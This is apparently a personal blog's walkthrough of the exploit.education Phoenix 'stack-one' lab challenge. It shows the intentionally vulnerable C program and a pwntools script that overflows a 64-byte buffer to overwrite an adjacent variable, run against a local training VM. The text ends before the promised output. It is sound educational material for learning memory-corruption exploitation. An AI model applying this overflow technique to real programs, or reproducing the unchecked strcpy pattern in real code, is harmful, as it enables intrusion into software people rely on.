π–ˆπ–žπ–‡π–Šπ–—π–Œπ–šπ–—π–šπŸ’€~$

Hamza's Blog

View on GitHub

Stack-one

Source Code


/*
 * phoenix/stack-one, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable to 0x496c5962
 *
 * Did you hear about the kid napping at the local school?
 * It's okay, they woke up.
 *
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  if (argc < 2) {
    errx(1, "specify an argument, to be copied into the \"buffer\"");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, argv[1]);

  if (locals.changeme == 0x496c5962) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Getting closer! changeme is currently 0x%08x, we want 0x496c5962\n",
        locals.changeme);
  }

  exit(0);
}

Let’s digging the code:

This challenge is similar to Stack one, but the main goal here is to not only change the variable of the changeme to the overflow value but to a specific value that is 0x496c5962, so we use the pwntools module to write a script that could accomplish that


#!/usr/bin/python
## script by Hamza Saidu 
## Cyberguru
## enjoy!!!

from pwn import *


s = ssh(host='localhost', user='user', password='user', port=2222)

# crafting payload
payload = b"A" * 64

# adding the comparision variable
payload += p32(0x496c5962)

p = s.run(f'/opt/phoenix/amd64/stack-one {payload.decode()}')

# p.sendline(payload)

print(p.recvall().decode())

Explanation of the code:

from pwn import *
s = ssh(host='localhost', user='user', password='user', port=2222)
# crafting payload
payload = b"A" * 64
# adding the comparision variable
payload += p32(0x496c5962)
p = s.run(f'/opt/phoenix/amd64/stack-one {payload.decode()}')
print(p.recvall().decode())

And finally running the script we have: